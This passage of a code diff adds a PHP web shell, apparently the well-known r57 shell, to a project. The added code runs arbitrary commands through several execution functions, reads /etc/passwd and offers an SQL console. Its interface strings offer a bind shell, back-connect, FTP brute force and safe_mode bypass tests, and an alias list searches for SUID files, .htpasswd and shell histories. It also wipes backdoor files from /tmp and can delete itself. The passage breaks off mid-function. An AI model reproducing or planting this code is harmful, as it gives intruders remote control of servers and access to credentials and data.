+     while(ocifetch($stat))
+      {
+      echo "<tr>";
+      for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; }
+      echo "</tr>";
+      }
+     echo "</table><br>";
+     }
+     @ocifreestatement($stat); 
+     }
+    }
+    }
+   @ocilogoff($db);
+   }
+  break;
+  }
+ echo "<form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; 
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }	
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'???????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text77'=>'???????? ????????? ???? ??????',
+'ru_text78'=>'?????????? ???????',
+'ru_text79'=>'?????????? ???????',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;	
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 	
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function fe($l,$n)
+{
+$text['ru']  = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????');
+$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server');	
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function mr($l,$n)
+{
+$text['ru']  = array('?? ??????? ????????? ??????','?????? ??????????');
+$text['eng'] = array('Can\'t send mail','Mail sent');	
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }	
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
